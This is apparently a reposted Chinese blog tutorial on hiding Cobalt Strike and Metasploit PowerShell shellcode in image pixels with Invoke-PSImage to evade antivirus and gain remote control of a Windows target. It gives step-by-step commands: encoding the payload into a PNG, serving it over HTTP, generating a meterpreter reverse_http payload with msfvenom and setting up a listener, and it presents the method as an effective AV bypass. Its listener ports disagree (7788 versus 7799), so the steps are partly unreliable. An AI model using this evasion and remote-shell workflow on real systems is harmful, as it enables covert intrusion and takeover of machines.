博客
关于我
shellcode隐写到像素RGB免杀上线到CS
阅读量:443 次
发布时间:2019-03-06

本文共 1601 字,大约阅读时间需要 5 分钟。

利用图片像素RGB隐藏Shellcode实现免杀免杀上线(CS与MSF双平台)


前言

最近跟一个朋友一起开发一个站点时,发现站点开了很多杀软,包括各种CSPowershell马和反调试工具,使用传统的CS反调试方法无法成功上线。后来在GitHub上找到了一种将Shellcode隐藏到图片RGB像素的方法,并成功将其上线到CS平台。这个免杀方法效果非常好,且实现相对简单。今天将详细记录这个免杀过程。


本地环境

靶机:Win7

IP:192.168.82.136
攻击机:FSEC
IP:192.168.82.134


步骤

CS平台使用步骤

  • 生成PowerShell脚本

    首先,在CS上生成一个PowerShell脚本文件。可以使用以下命令:

    Set-ExecutionPolicy Unrestricted -Scope CurrentUserImport-Module .\Invoke-PSImage.ps1Invoke-PSImage -Script .\payload.ps1 -Image .\shell.jpg -Out .\shell.png -Web
  • 生成带有Shellcode的图片

    执行上述命令后,会生成一张名为shell.png的图片文件。这个图片文件的每个像素都被修改为特定的RGB值,隐藏了Shellcode。

  • 架设HTTP服务器

    使用Python架设一个简单的HTTP服务器,用于提供隐藏Shellcode的图片。命令如下:

    python3 -m http.server 80
  • 在靶机上运行PowerShell

    将生成的shell.png文件中的URL替换为攻击机的HTTP地址(如http://192.168.82.134/shell.png),然后在靶机上运行PowerShell脚本。Shellcode会通过图片被传递到靶机,并执行相应的攻击代码。


  • MSF平台使用步骤

  • 生成PowerShell反向HTTP支付拉伸(RAT)

    使用Metasploit Framework(MSF)生成一个RATPayload:

    msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.82.134 LPORT=7788 -f psh-reflection > msf.ps1
  • 将Shellcode隐藏到图片中

    将生成的msf.ps1文件与Invoke-PSImage.ps1文件放在同一目录,按照CS平台步骤生成一个带有Shellcode的图片(如msf.png)。

  • 在MSF中设置反向监听

    在攻击机上使用MSF设置一个反向HTTP监听:

    msf6 > use exploit/multi/handlermsf6 > set payload windows/x64/meterpreter/reverse_httpmsf6 > set lhost 192.168.82.134msf6 > set lport 7799msf6 > exploit
  • 在靶机上运行PowerShell

    将生成的msf.png文件中的URL替换为攻击机的HTTP地址(如http://192.168.82.134:7799/msf.png),然后在靶机上运行PowerShell脚本。Shellcode会通过图片被传递到靶机,并执行远程攻击。


  • 结尾

    这种将Shellcode隐藏到图片RGB像素的免杀方法非常实用,既能绕过杀软检测,又能轻松实现远程控制。无论是CS平台还是Metasploit平台,都可以通过简单的命令完成整个流程。对于对技术感兴趣的朋友来说,这是一个非常值得尝试的方法。


    免责声明

    本文仅用于技术交流和学习,严禁将介绍的方法用于非法操作。如果您对他人造成损失,请自行承担后果。如果您无法接受上述约定,请不要阅读本文。

    转载地址:http://reakz.baihongyu.com/

    你可能感兴趣的文章
    OWL本体语言
    查看>>
    P with Spacy:自定义文本分类管道
    查看>>
    P-DQN:离散-连续混合动作空间的独特算法
    查看>>
    P1035 I need help
    查看>>
    P1073 最优贸易
    查看>>
    P1364 医院设置
    查看>>
    spring缓存注解@Cacheable、@CacheEvict、@CachePut使用
    查看>>
    P1865 A % B Problem
    查看>>
    P2158 [SDOI2008]仪仗队
    查看>>
    P2260 [清华集训2012]模积和
    查看>>
    P3203 [HNOI2010]弹飞绵羊 —— 懒标记?分块?
    查看>>
    P3950部落冲突
    查看>>
    P4313 文理分科
    查看>>
    SpringBoot中集成LiteFlow(轻量、快速、稳定可编排的组件式规则引擎)实现复杂业务解耦、动态编排、高可扩展
    查看>>
    SpringBoot中集成influxdb-java实现连接并操作Windows上安装配置的influxDB(时序数据库)
    查看>>
    P8738 [蓝桥杯 2020 国 C] 天干地支
    查看>>
    package,source folder,folder相互转换
    查看>>
    SpringBoot中集成Flyway实现数据库sql版本管理入门以及遇到的那些坑
    查看>>
    package.json文件常用指令说明
    查看>>
    SpringBoot中集成eclipse.paho.client.mqttv3实现mqtt客户端并支持断线重连、线程池高并发改造、存储入库mqsql和redis示例业务流程,附资源下载
    查看>>